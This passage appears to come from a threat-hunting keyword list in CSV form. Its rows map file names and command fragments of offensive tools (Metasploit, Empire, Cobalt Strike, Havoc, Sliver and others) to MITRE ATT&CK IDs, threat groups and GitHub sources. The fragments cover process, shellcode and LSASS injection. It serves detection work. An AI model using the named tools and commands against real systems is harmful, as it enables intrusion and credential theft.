WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-BypassUAC.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*InjectDll.cpp*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*InjectDll.vcxproj*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*injected into LSASS*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","New-HoneyHash.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*InjectedCredentials.csv*","offensive_tool_keyword","HoneypotBuster","Microsoft PowerShell module designed for red teams that can be used to find honeypots and honeytokens in the network or at the host","T1083 - T1059.001 - T1112","TA0007 - TA0002","N/A","N/A","Lateral Movement","https://github.com/JavelinNetworks/HoneypotBuster","1","0","N/A","8","3","270","60","2017-12-05T13:03:11Z","2017-07-22T15:40:44Z" +"*injectEtwBypass*","offensive_tool_keyword","cobaltstrike","CobaltStrike BOF - Inject ETW Bypass into Remote Process via Syscalls (HellsGate|HalosGate)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/injectEtwBypass","1","1","N/A","10","10","253","54","2021-09-28T19:09:38Z","2021-09-21T23:06:42Z" +"*inject-etw-bypass*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*injectify*","offensive_tool_keyword","injectify","Perform advanced MiTM attacks on websites with ease.","T1557.001 - T1190 - T1071.001 - T1056.001","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/samdenty/injectify","1","0","N/A","N/A","7","650","122","2022-07-20T15:02:37Z","2017-11-06T17:01:50Z" +"*Injection* -ProcName lsass*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-PSInject.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Injection\Spawn32*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*Injection\Spawn64*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*Injection-Exploit-1.0-SNAPSHOT-all.jar*","offensive_tool_keyword","POC","JNDI-Injection-Exploit is a tool for generating workable JNDI links and provide background services by starting RMI server. LDAP server and HTTP server. Using this tool allows you get JNDI links. you can insert these links into your POC to test vulnerability.","T1190 - T1133 - T1595 - T1132 - T1046 - T1041","TA0009 - TA0003 - TA0002 - TA0007 - TA0008 - TA0001","N/A","N/A","Exploitation tools","https://github.com/welk1n/JNDI-Injection-Exploit","1","1","N/A","N/A","10","2331","716","2023-03-22T21:23:32Z","2019-10-10T01:53:49Z" +"*Injections/Traversal.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*Injections/XSS.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*Inject-LocalShellcode*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*InjectMate.py*","offensive_tool_keyword","burpsuite","Multi-tabbed extension that helps generate payloads for various purposes (XSS. SQLi. Header injection. and more).","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/laconicwolf/burp-extensions","1","1","N/A","N/A","2","136","34","2019-04-08T00:49:45Z","2018-03-23T16:05:01Z" +"*InjectMateCommunity.py*","offensive_tool_keyword","burpsuite","A collection of scripts to extend Burp Suite","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/laconicwolf/burp-extensions","1","1","N/A","N/A","2","136","34","2019-04-08T00:49:45Z","2018-03-23T16:05:01Z" +"*Injector.exe*","offensive_tool_keyword","POC","POC to check for CVE-2020-0796 / SMBGhost Expected outcome: cmd.exe launched with system access","T1210.001 - T1213 - T1212 - T1201","TA0007 - TA0002","N/A","N/A","Exploitation tools","https://github.com/ZecOps/CVE-2020-0796-LPE-POC","1","1","N/A","N/A","3","242","90","2020-04-02T08:01:38Z","2020-03-30T16:06:50Z" +"*injector.ps1*.kirbi*","offensive_tool_keyword","PowershellKerberos","Some scripts to abuse kerberos using Powershell","T1558.003 - T1558.004 - T1059.001","TA0006 - TA0002","N/A","N/A","Exploitation Tools","https://github.com/MzHmO/PowershellKerberos","1","0","N/A","9","3","263","37","2023-07-27T09:53:47Z","2023-04-22T19:16:52Z" +"*InjectPERemote.cs*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" +"*InjectPEWMIFSRemote*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","0","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" +"*InjectProc*","offensive_tool_keyword","InjectProc","Process injection is a very popular method to hide malicious behavior of code and are heavily used by malware authors.There are several techniques. which are commonly used: DLL injection. process replacement (a.k.a process hollowing). hook injection and APC injection.","T1055 - T1055.012 - T1055.001 - T1055.003","TA0002 - TA0003 - TA0004 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/secrary/InjectProc","1","0","N/A","N/A","10","981","225","2019-02-10T11:05:15Z","2017-05-26T08:08:20Z" +"*injectremote.boo*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" +"*Inject-RemoteShellcode*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*inject-shellcode *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*injectShellcode*","offensive_tool_keyword","C2 related tools","Thread Stack Spoofing - PoC for an advanced In-Memory evasion technique allowing to better hide injected shellcode's memory allocation from scanners and analysts.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ThreadStackSpoofer","1","1","N/A","10","10","875","158","2022-06-17T18:06:35Z","2021-09-26T22:48:17Z" +"*InjectShellcode*","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","1","N/A","10","10","475","115","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" +"*InjectShellCode.cs*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" +"*InjectShellCodeRemote.cs*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" +"*InjectShellCodeWMIFSB64*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","0","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" +"*injectsu.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*inligpkjkhbpifecbdjhmdpcfhnlelja*","greyware_tool_keyword","Free One Touch VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*inline_assembly -Assembly *","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" +"*inlineAssembly*/execmethod*","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","825","133","2023-09-06T05:17:05Z","2022-12-08T19:40:47Z" +"*inlineDll*/dll*","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","825","133","2023-09-06T05:17:05Z","2022-12-08T19:40:47Z" +"*inline-exec.py*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*inline-execute *","offensive_tool_keyword","cobaltstrike","Various Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rvrsh3ll/BOF_Collection","1","0","N/A","10","10","481","49","2022-10-16T13:57:18Z","2020-07-16T18:24:55Z" +"*inline-execute *.o*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*inline-execute *tokenprivileges.o*","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","0","N/A","9","3","265","35","2023-03-23T09:50:09Z","2023-03-20T04:19:40Z" +"*inline-execute StartWebClientSvc.x64.o*","offensive_tool_keyword","NTLMRelay2Self","An other No-Fix LPE - NTLMRelay2Self over HTTP (Webdav).","T1078 - T1078.004 - T1557 - T1557.001 - T1068","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/med0x2e/NTLMRelay2Self","1","0","N/A","10","4","349","45","2022-04-30T19:02:06Z","2022-04-30T10:05:02Z" +"*inline-execute*whereami.x64*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) that uses handwritten shellcode to return the process Environment strings without touching any DLL's.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/whereami","1","1","N/A","10","10","152","27","2023-03-13T15:56:38Z","2021-08-19T22:32:34Z" +"*inlineExecute.nim*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*InlineExecute-Assembly*","offensive_tool_keyword","cobaltstrike","InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - 